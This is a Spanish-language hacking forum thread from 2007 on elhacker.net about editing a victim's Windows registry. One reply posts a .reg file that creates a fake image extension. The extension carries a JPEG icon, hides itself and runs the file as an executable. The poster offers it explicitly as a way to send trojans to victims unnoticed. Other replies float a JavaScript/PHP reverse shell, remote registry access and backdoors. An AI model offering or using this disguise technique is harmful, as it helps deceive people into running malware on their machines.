elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
22 Mayo 2012, 23:08  


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderadores: Karcrack, [Zero])
| | |-+  Editar registro a una victima¿?		 0 Usuarios y 2 Visitantes están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: Editar registro a una victima¿?  (Leído 2,219 veces)
aKimbo

Desconectado Desconectado

Mensajes: 48



Ver Perfil
Re: Editar registro a una victima¿?
« Respuesta #15 en: 18 Octubre 2007, 22:50 »
Cita de: BenRu en 18 Octubre 2007, 21:04
Con javascript se puede intentar, pero es algo engorroso.

Sirdarkcat hizo un tipo de reverse shell, usando js y php.
El js debera estar en la maquina a infectar. Asi que, deberia estar en el pc.
Supongo que si lo dejas alojado en una pagina, y la dejas abierta, podras manejar el php con la shel

También para añadir una vez lei que esto es posible por via web, pero desconozco el código html para lograrlo
En línea
La religión es lo que evita que los pobres asesinen a los ricos

Napoleón Bonaparte
layker

Desconectado Desconectado

Mensajes: 110



Ver Perfil
Re: Editar registro a una victima¿?
« Respuesta #16 en: 19 Octubre 2007, 11:59 »
aki dejo las claves del registro x si a alguien le interesa, cuando dscubra alguna forma de "contaminar" con el registro ya la dire..
Citar
Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\.jpq]
@="jpcfile"

[HKEY_CLASSES_ROOT\jpqfile]
@="Imagen JPEG"

[HKEY_CLASSES_ROOT\jpqfile\DefaultIcon]
@="shimgvw.dll,3"

[HKEY_CLASSES_ROOT\jpcfile\NeverShowExt]

[HKEY_CLASSES_ROOT\jpcfile\Shell]

[HKEY_CLASSES_ROOT\jpcfile\Shell\Open]

[HKEY_CLASSES_ROOT\jpcfile\Shell\Open\Command]
@="\"%1\" %*"
Este codigo copiarlo en un block de notas y guardarlo como .reg y ejecutarlo

esto crea una extension .jpc (en este caso) se puede moficiar....
que al cambiar el formato .exe por .jpc automaticamente el .jpc desaparece, se cambia el icono al del jpg por defecto y se ejecuta como cualquier ejecutable....
si se consige "infectar" a una victima con stas claves es muy util para enviar troyanos sin la mas minima sospecha... un salu2
espero k sirva de algo
En línea
Cegik

Desconectado Desconectado

Mensajes: 9


Ver Perfil
Re: Editar registro a una victima¿?
« Respuesta #17 en: 25 Octubre 2007, 02:44 »
Hey guys!
Existe una forma de acceder a un Registro remoto (solo NT), me parece que se hace con el comando externo REG desde la consola, pero depende de esta funcion no este bloqueada en el destino (los server la tinene bloqueda por defecto).

Este es un antiguo agujero de seguridad, y hace mucho que Microsoft le ha seguido la pista (aun que no se por que existe en un principio), probablemente tambien tengan problemas con el FireWall de XP (nunca he hecho la prueba)...

Y por ultimo un caballo de troya, como dicen, mas concretamente una BackDoor, es mucho mas versatil, yo soy mas programador que hacker, asi que si alguien lo hace a la antigua... :o aunque el API de windows permite esto, esta muy restringido.

Si encuentro un metodo lo posteo.
En línea
Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Editar registro (REGEDIT)
Windows 		elhacker17 4 2,327 Último mensaje 27 Noviembre 2010, 16:54
por 777Rubenix777
Porque no puedo editar el registro. « 1 2 »
Scripting 		TheTroyanDark 26 1,945 Último mensaje 3 Julio 2011, 22:36
por WaAYa HaCK
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines